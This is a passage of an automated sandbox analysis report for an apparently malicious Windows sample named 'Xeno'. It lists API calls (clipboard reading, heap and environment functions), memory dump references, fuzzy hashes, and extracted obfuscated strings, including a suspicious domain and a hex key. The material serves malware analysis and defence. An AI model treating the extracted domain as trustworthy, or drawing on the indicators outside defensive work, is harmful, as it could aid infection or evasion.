                            • Instruction Fuzzy Hash: 98F0F8706087018FE304DF24C5A871BBBE2BF89708F21C81CE0954B394CBB5AA09CF82
                            APIs
                            • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C6F3
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: Initialize
                            • String ID:
                            • API String ID: 2538663250-0
                            • Opcode ID: 2129cf03f5246ce104dac8e3b0bd67a57919508efd696816efe05e5989fbb1cb
                            • Instruction ID: 397c2700ae7b66a5aee633f039fc9f49dc266c58689241c67d6772894b5e7069
                            • Opcode Fuzzy Hash: 2129cf03f5246ce104dac8e3b0bd67a57919508efd696816efe05e5989fbb1cb
                            • Instruction Fuzzy Hash: 7CE0C226BE410417E3046B6CEC07F41361A83C2761F08C23AA210E66C4DD38A801826A
                            APIs
                            • RtlFreeHeap.NTDLL(?,00000000,00000000,00412A77), ref: 0043D0E0
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: d530fc94e3056614eaf0cf2985c41a64dba0245a0d64ecf818d25c00fd8e34f1
                            • Instruction ID: 000087db01947eb917a1f59d002a5db7393f8f104cbb5597166c8b4a11e00db3
                            • Opcode Fuzzy Hash: d530fc94e3056614eaf0cf2985c41a64dba0245a0d64ecf818d25c00fd8e34f1
                            • Instruction Fuzzy Hash: 24D01231445232EBC6502F18BC09BCB3B95DF4E725F0708A5F4416B0B5DB24DC91CAD8
                            APIs
                            • RtlAllocateHeap.NTDLL(?,00000000,?,3E73B38A,0040873F,`Abc), ref: 0043D0B0
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 06fc10c74ca97a524c8197303d623a6589d07f6638300fd272c5be366c2fedbb
                            • Instruction ID: 52af4fdc57eeab093beb84717f58dd41dd83a8c90dfe2c0cf9cc36f9c47ed945
                            • Opcode Fuzzy Hash: 06fc10c74ca97a524c8197303d623a6589d07f6638300fd272c5be366c2fedbb
                            • Instruction Fuzzy Hash: 6DC09B31445321ABC5502B15FC0DFCA7F55DF49351F114465B00567072C770AC41C6D8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: "$"$"$#$#$$$&$($*$*$*$*$,$,$-$-$/$/$1$1$1$2$2$3$3$3$4$4$4$48DD14122033DD2BC61BA3BAD8862B62$5$6$6$6$7$7$7$7$<$<$=$>$>$>$>$>$?$@$B$C$C$D$D$F$H$J$J$K$K$L$L$L$N$O$O$O$P$P$Q$R$R$R$T$T$T$T$V$X$X$Z$Z$Z$[$\$\$^$`$b$d$d$f$h$j$l$n$p$r$s$sobrattyeu.bond$t$u$v$x$z$|$~
                            • API String ID: 0-3897458280
                            • Opcode ID: 7a804a1a2148a722f5c9f87b710d1aaa97649f1d123968ff1145dbbe65e20771
                            • Instruction ID: 8a0841de800e6ad95827567054b00ad942a8976767375d9518dd06aae180d168
                            • Opcode Fuzzy Hash: 7a804a1a2148a722f5c9f87b710d1aaa97649f1d123968ff1145dbbe65e20771
                            • Instruction Fuzzy Hash: D932F2209087E98DDB32C67C8C587DDBFB15B63314F1843D9D0E86B2D2D6B90A85CB66
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: "$"$#$#$$$($*$,$,$,$.$0$1$1$1$2$3$3$3$3$4$6$:$:$:$;$<$B$C$C$H$H$K$K$O$P$T$U$U$W$X$Y$Y$Z$^$_$`$`$c$e$f$g$i$i$j$l$l$m$n$n$q$q$s$s$t$u$u$v$v$w$y${$}
                            • API String ID: 0-4217477181
                            • Opcode ID: 2fe2b5dcc309c7f032d11c7676046640cb2a811eda52af8db404590c91244872
                            • Instruction ID: 0d631b6e0bad6882a86c37c78288a67545caacf28bc4ca2141decf8a711f4690
                            • Opcode Fuzzy Hash: 2fe2b5dcc309c7f032d11c7676046640cb2a811eda52af8db404590c91244872
                            • Instruction Fuzzy Hash: B9B2BF71A0C7C18BC3258A3C884439FBBD16BD6324F194B6DE4E9873D2D6789845C797
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$$+$+$.$/$2$2$3$4$6$7$8$8$9$;$<$>$@$@$B$B$D$F$G$H$J$L$M$N$O$P$R$T$T$V$W$X$Z$Z$\$]$^$`$a$b$c$d$e$f$g$h$j$k$l$n$o$p$r$s$t$v$x$x$y$z$|$}$~
                            • API String ID: 0-2166590413
                            • Opcode ID: 316f83764fdfa2307027b3b6d8fc1e52c897dd7cb484d367259af1444604bdd9
                            • Instruction ID: 28cf5dfb86c9a20de154088ad24fe8391ac7c7904c8b7326ded3421dfb4ae9d0
                            • Opcode Fuzzy Hash: 316f83764fdfa2307027b3b6d8fc1e52c897dd7cb484d367259af1444604bdd9
                            • Instruction Fuzzy Hash: 78221F219087E989DB32C63C8C447DDBEA15B67324F0843D9D1EC6B2D2C7B50B85DB66
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 'u!w$)aB$*];_$,A=C$0a6c$1v?t$2z%x$5e5g$=i)k$G9\;$Kn5l$S1W3$X5g7$f1^3$j=i?$x[ $y9l;$|)t+$|-B/$3=$71$qs$y{
                            • API String ID: 0-3697304203
                            • Opcode ID: aa3492956efd5b5790a695c69ee8b2088feb2858c41bb82eaee84c983e3f0ddc
                            • Instruction ID: 28e714bd50e10af8c41feb94186a0781495570034c91797f689588b73619f2fc
                            • Opcode Fuzzy Hash: aa3492956efd5b5790a695c69ee8b2088feb2858c41bb82eaee84c983e3f0ddc
                            • Instruction Fuzzy Hash: 3F9212B5A10721CFD714CF25D8806AABBB2FF45314F6985ADC489AF352D735A842CF84
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: #$($2$4$6$7$<$L$N$\$a$d$z
                            • API String ID: 0-2675021843
                            • Opcode ID: 217042fcf425bca7ba762c0f0974a15efb2fa7f1c1b3472706f50882f844bc11
                            • Instruction ID: 8b0d74af031e13d7082c1fae75525c50212d23be6f38d7ab49b51dbc2e085af0
                            • Opcode Fuzzy Hash: 217042fcf425bca7ba762c0f0974a15efb2fa7f1c1b3472706f50882f844bc11
                            • Instruction Fuzzy Hash: BF91142260C7D14AD305997C884425FBFD20BE7224F1DCAAEE5E6873C2D5B9C90683A7
                            APIs
                            • RtlExpandEnvironmentStrings.NTDLL ref: 00410FEA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: EnvironmentExpandStrings
                            • String ID: !$'$+$6$Z$n$t
                            • API String ID: 237503144-9893819
                            • Opcode ID: 99f6ccfbe35bece81bf8a630c8f55093e9e890b477979113cb74e8cdd48fc24d
                            • Instruction ID: 1d2933176acbf6399ddc32c77989705dfc4d090ef2e3c7131547c07c8bef2784
                            • Opcode Fuzzy Hash: 99f6ccfbe35bece81bf8a630c8f55093e9e890b477979113cb74e8cdd48fc24d
                            • Instruction Fuzzy Hash: 4712A27160C7908BC7249B38C4943EFBBE1AB89314F144A2FE9DA973D1D6788981CB47
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 7$AE$D$Ip$OL$f$gfff$v$|E$~w
                            • API String ID: 0-2396867168
                            • Opcode ID: f6f123537915368f7177c65015ead87f293cc8620350017853b9ef37f0bbd50b
                            • Instruction ID: f650164397a1220ce77ee837e10c64e87231783d33de7ca0420ad25b9b007bcd
                            • Opcode Fuzzy Hash: f6f123537915368f7177c65015ead87f293cc8620350017853b9ef37f0bbd50b
                            • Instruction Fuzzy Hash: 01922575618300CFD724CF25D8917ABB7E1FF86314F598A2DE4998B2A1D738D842CB4A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$J$M/($PkA$wt
                            • API String ID: 0-2150325240
                            • Opcode ID: 3cdbd5a59f1c456c57d50944254b0a9e2aee2dcf55ad76d546f3a653779b7b43
                            • Instruction ID: 2097e0ab478c5fb4104a198792983df039d6735c805d827ece3f1349a6c07896
                            • Opcode Fuzzy Hash: 3cdbd5a59f1c456c57d50944254b0a9e2aee2dcf55ad76d546f3a653779b7b43
                            • Instruction Fuzzy Hash: 39325B75A083508BD7248F28C8917EBB7E2EFD9324F194A7DE4C587395D7388941C786
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0$<$>$B$F$I$Q$kpq&$x$}
                            • API String ID: 0-3952396715
                            • Opcode ID: 24fb717b1005c24b2e204ef3df6c93f35e97be681929674b6f42489830c341fd
                            • Instruction ID: fa258679975c06a915c49adcd9c3571f8da54193e14a857b2c601fadba84c631
                            • Opcode Fuzzy Hash: 24fb717b1005c24b2e204ef3df6c93f35e97be681929674b6f42489830c341fd
                            • Instruction Fuzzy Hash: E9D1A2219087DA8ECB22C6BC88442CDBFB15F67330F194399E4F46B3E6D7644946C7A6
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                            • String ID: R
                            • API String ID: 1006321803-1466425173
                            • Opcode ID: b51a5d9e1f15048acf04de68c8079ef9c4ac5b682592d698e570beb2a0dddd99
                            • Instruction ID: 6c790f0c14f3510c170d12d6fa22ba9d8295c45850264baa4e5968bad997c9f4
                            • Opcode Fuzzy Hash: b51a5d9e1f15048acf04de68c8079ef9c4ac5b682592d698e570beb2a0dddd99
                            • Instruction Fuzzy Hash: 8A41C37150CB828FD301AF7C988831FBFE09B96324F094A6EE4D5962D2D7388649C797
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: #$@$B$C$D$`$a$f
                            • API String ID: 0-3902758071
                            • Opcode ID: 8431bc05fbf4ae2a68e58cf0a730e60343e0988a62d7242d3f6638b5474ef362
                            • Instruction ID: 85993dc0967d8f3cbc0d6d8a434c450468ced68532d23729f38dca8b84427bf1
                            • Opcode Fuzzy Hash: 8431bc05fbf4ae2a68e58cf0a730e60343e0988a62d7242d3f6638b5474ef362
                            • Instruction Fuzzy Hash: CF511733A0C7A04BE3058938884535BBAC25BE5314F0DCA7EE9D9973C2D6BD8D1683D6
                            APIs
                            • FreeLibrary.KERNEL32(?), ref: 00418B37
                            • FreeLibrary.KERNEL32(?), ref: 00418B79
                              • Part of subcall function 0043E7C0: LdrInitializeThunk.NTDLL(0044184E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043E7EE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: FreeLibrary$InitializeThunk
                            • String ID: T0J$c`$pv
                            • API String ID: 764372645-1959182718
                            • Opcode ID: 40549d168b9b23683bea20ea7d3f8df14ed0ef22f9af7c7413b0adf457a3f8db
                            • Instruction ID: f6a5aba9ea7ab9b0fda9a98a556fa895e4c0b3dcf583012df9e209da60cbbcf9
                            • Opcode Fuzzy Hash: 40549d168b9b23683bea20ea7d3f8df14ed0ef22f9af7c7413b0adf457a3f8db
                            • Instruction Fuzzy Hash: 1E523774608300ABE7148F25DC54BABBBE2EBD5714F148A1DF494473E1D7399C82DB4A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: &,&#$;$C?1*$N$p$v8*+$VA
                            • API String ID: 0-127065759
                            • Opcode ID: 2949d67034982d41a1c3e2afaf1c9e6be2eeaa788f870a18e9070060a5a47fc7
                            • Instruction ID: 06f18023531571a2c868254a084415e26137606e72cc660c0f441ffb9a456cf5
                            • Opcode Fuzzy Hash: 2949d67034982d41a1c3e2afaf1c9e6be2eeaa788f870a18e9070060a5a47fc7
                            • Instruction Fuzzy Hash: D02217B6A08741CFD7248F25D8912EBB7E2EFC5314F19893EE49987351E7389841CB86
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: /$.$T$t$t$x$}
                            • API String ID: 0-1906187332
                            • Opcode ID: 5a46cd9993cf41d9b4c1f09c6a09eb63b67ffef489384db942ac5ac67120cb7d
                            • Instruction ID: 6f5c6ecd064ac2349477fe736486ae4bec1a54f2304a3953b2cc53b43e76de3f
                            • Opcode Fuzzy Hash: 5a46cd9993cf41d9b4c1f09c6a09eb63b67ffef489384db942ac5ac67120cb7d
                            • Instruction Fuzzy Hash: 5EF1347560C3808FD3109F39E88062BBBE2AF86314F984A6DF49547392D77A9D19CB17
                            APIs
                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 004177FF
                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 0041787D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: EnvironmentExpandStrings
                            • String ID: 7yA$u$^\
                            • API String ID: 237503144-2922194826
                            • Opcode ID: 246a1d4c6e25efb89ba2d3e171abe6c0b02338a9fcd4db2d919464085a321d5c
                            • Instruction ID: e6eb004f53d8726aea76ffd0efd70be5f0a3a6f1dbfce08b5db5ba1f2a6648eb
                            • Opcode Fuzzy Hash: 246a1d4c6e25efb89ba2d3e171abe6c0b02338a9fcd4db2d919464085a321d5c
                            • Instruction Fuzzy Hash: 3AC1F1756083518BC714CF28C8D17ABB7F1EF99364F184A2EE8C58B3A1E7389941CB56
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: z0F$ ;45$sobrattyeu.bond$vw$WQ$[U
                            • API String ID: 0-784738450
                            • Opcode ID: 780b9195aa5403699f9e55c46d47cbdf45db762263f6f7f3a616397b55b141c1
                            • Instruction ID: cc3ba95a67fe0048f7f2a03910913153944ac2691b8f4269222efab85973a066
                            • Opcode Fuzzy Hash: 780b9195aa5403699f9e55c46d47cbdf45db762263f6f7f3a616397b55b141c1
                            • Instruction Fuzzy Hash: 20F1DDB414C3C18ED3758F25D095BEFBBE1EB92304F288A6EC4D96B292C7394506CB56
                            APIs
                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00429E10
                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 00429E70
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: EnvironmentExpandStrings
                            • String ID: S4j*$t(E.
                            • API String ID: 237503144-2453282489
                            • Opcode ID: 8b9fabb23ceea281e1ce8d5ba9b8f075d64ae37bf022b25a4c02ecccabee8d94
                            • Instruction ID: 440ce7e223d083bc5d9a0788336fb0847d9c4af22d6ea4fa372daf1b325f59fc
                            • Opcode Fuzzy Hash: 8b9fabb23ceea281e1ce8d5ba9b8f075d64ae37bf022b25a4c02ecccabee8d94
                            • Instruction Fuzzy Hash: 9B4105B5A093509FE7248F21ED80B5BBBE4FB82704F40193DF6868B282CA75D805CB56
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: S"(w$S"(w$`arc$f$i
                            • API String ID: 2994545307-3652705389
                            • Opcode ID: 3cf27f24d4a54fa8d9494d706c2cbceca3e228fec9bc6dc266a8f4799155dff1
                            • Instruction ID: 5afaf82e76ffb23cdac656c9cf2c4008b2c7e3162a0f634099996b4415f043f0
                            • Opcode Fuzzy Hash: 3cf27f24d4a54fa8d9494d706c2cbceca3e228fec9bc6dc266a8f4799155dff1
                            • Instruction Fuzzy Hash: 80222771A083418FC714CF29D88062BBBE1FB99314F189A2EF4A59B391D778DD05CB96
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: *42*$*42*$48DD14122033DD2BC61BA3BAD8862B62$@$S
                            • API String ID: 0-2218147639
                            • Opcode ID: cb33ff30cab87ea4efb279c8c58357c0d2a873310e5c54f995e9bfd1604666a8
                            • Instruction ID: b8117d0a28365a8dfbe96da3ef135e85e26fd6f3d8799e4bd6085a01cfbbe0c6
                            • Opcode Fuzzy Hash: cb33ff30cab87ea4efb279c8c58357c0d2a873310e5c54f995e9bfd1604666a8
                            • Instruction Fuzzy Hash: 11C125B560C3408BD718DF35D89166BBBE6EBC1304F18497EE4D58B382DA39C90ACB56
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: false$null$p~@$true
                            • API String ID: 0-1622223765
                            • Opcode ID: 0367202998be23f014bce7dcf4411251309bd5fa7ca7e4a417d40a46cb8a3e39
                            • Instruction ID: 7fa1c42d2f3a66576c307c4d8d93a52f7f4fac08dacd1534b97285e0529143c4
                            • Opcode Fuzzy Hash: 0367202998be23f014bce7dcf4411251309bd5fa7ca7e4a417d40a46cb8a3e39
                            • Instruction Fuzzy Hash: 7012F1B49043059BE7105F21EC41B277AA4AF41348F19443EE9C6AB3F2EB3DE954CB5A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: (ijk$L X$` X$
                            • API String ID: 0-1070671204
                            • Opcode ID: 8d5b616ccd3d70c898108f1295d10eab4249a091f6025fc3787dffea44c2899a
                            • Instruction ID: e07ee844c3a263f85f7665288f57badada396a9b121fcadee848a62c4a63fb5b
                            • Opcode Fuzzy Hash: 8d5b616ccd3d70c898108f1295d10eab4249a091f6025fc3787dffea44c2899a
                            • Instruction Fuzzy Hash: 2CC1D1B16183108FD724CF29D891A6BBBF1FF86314F04892DE9868B391E779D805CB56
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: :8>-$<;.%$Q$u!7=
                            • API String ID: 0-1236289958
                            • Opcode ID: f30878b6a4858dec0a2e971e688c54f4981c5af04d167c191633d82cf57404de
                            • Instruction ID: 08bec31c0f4dd7c03ede65b1caf782a16398cf1298081f2d1e44ee542996923b
                            • Opcode Fuzzy Hash: f30878b6a4858dec0a2e971e688c54f4981c5af04d167c191633d82cf57404de
                            • Instruction Fuzzy Hash: B1A132B6A083109FC714DF24D85166BB7E2EFD6304F48896DE4D68B391E738AD05CB4A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: A$yA$A
                            • API String ID: 0-525130035
                            • Opcode ID: c3f727362d8667d436ad01c94678ead0bca53e98b03f70e706ad55faedc9c487
                            • Instruction ID: f4d044325e820aa283e3d2a05993691b89dc021c5038b5178d9d372ebd677015
                            • Opcode Fuzzy Hash: c3f727362d8667d436ad01c94678ead0bca53e98b03f70e706ad55faedc9c487
                            • Instruction Fuzzy Hash: 76626DB0608F818FD3298F3C8855797BFD5AB5A324F184B5DA0FA873D2C77564018B6A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: ,$By${y
                            • API String ID: 0-1802238924
                            • Opcode ID: edf2ca160de9f5fd84b543cf716bed5a632c8705a25df2e8bdddd86990b4ecf0
                            • Instruction ID: 655acd501e1d7c7bb4de0b24453b14ecbb1d84a7eaee0c2b2df6b5681a14dfd8
                            • Opcode Fuzzy Hash: edf2ca160de9f5fd84b543cf716bed5a632c8705a25df2e8bdddd86990b4ecf0
                            • Instruction Fuzzy Hash: 8DC127713483518BC325DE1884816ABBBE2EBD2704F18883DD4D16B386D679C91FDB97
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: JF$qv$|z
                            • API String ID: 0-561897946
                            • Opcode ID: b299a7b515a74c979f3fd422fa578213326ae42fdb22a80657d9428658ce2c21
                            • Instruction ID: 22d5c571a2ac7aede9346139aecc838d85eca5575369957d4de6705c9554004a
                            • Opcode Fuzzy Hash: b299a7b515a74c979f3fd422fa578213326ae42fdb22a80657d9428658ce2c21
                            • Instruction Fuzzy Hash: FDC1EDB4618390CFE3248F25E84076BBBE1FBC6304F55492DE5C99B291D774A805CB5B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 1$f$}
                            • API String ID: 0-3862234615
                            • Opcode ID: f592de7bbe46ec1f67406ce58b75c6966565d870a1c725579df15070b39435d2
                            • Instruction ID: c34b1a5a124b5ef1578c07ea1b4e43cc779c3d7466038b1024325422850a1a27
                            • Opcode Fuzzy Hash: f592de7bbe46ec1f67406ce58b75c6966565d870a1c725579df15070b39435d2
                            • Instruction Fuzzy Hash: 12A10872A0D7408BC758AB3984812AFFBD25FC5324F198B2FE4E9973D1DA3885428747
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
